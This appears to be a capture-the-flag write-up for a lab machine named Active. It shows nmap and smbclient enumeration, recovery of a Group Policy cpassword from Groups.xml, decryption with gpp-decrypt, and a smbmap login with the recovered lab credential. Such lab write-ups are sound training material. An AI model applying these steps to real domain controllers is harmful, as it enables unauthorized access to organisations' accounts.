Difficulty: Medium
Machine Creator: eks & mrb3n
Tools Used:
NMAP
SMBCLIENT
gpp-decrypt
smbmap
ldapsearch
GetUserSPN.py
Hashcat
wmiexec.py
Task: To find User.txt and Root.txt
Network Enumeration
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.100
The nmap scan shows us some impressive results. We can see port 53 Microsoft DNS, port 88 Kerberos, and port 389,3268 LDAP. From all these ports we can expect this server to be a domain controller for the domain active.htb.
SMB
SMB port 445 is also on this box lets see if we can access any open shares.
smbclient -L //10.10.10.100
smbclient //10.10.10.100/Replication
After some trial and error, I was able to access the Replication directory which is a domain share.
After going through the shares from the domain controller, we can see the directory “Policies” this share holds all the group policies. In this directory, there is Groups.xml file this file can contain some vital information.
Group Policy
The groups.xml file is used in older versions of windows to modify accounts via group policy. In this file, we can see this will update the user active.htb\SVC_TGS and will change the password. The cpassword is an encrypted version of the password.
CPASSWORD
https://msdn.microsoft.com/en-us/library/cc422924.aspx
The vulnerability in the cpassword is the encryption key that is well known, and Microsoft has never changed the key — using the tool gpp-decrypt.
SMBMAP
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100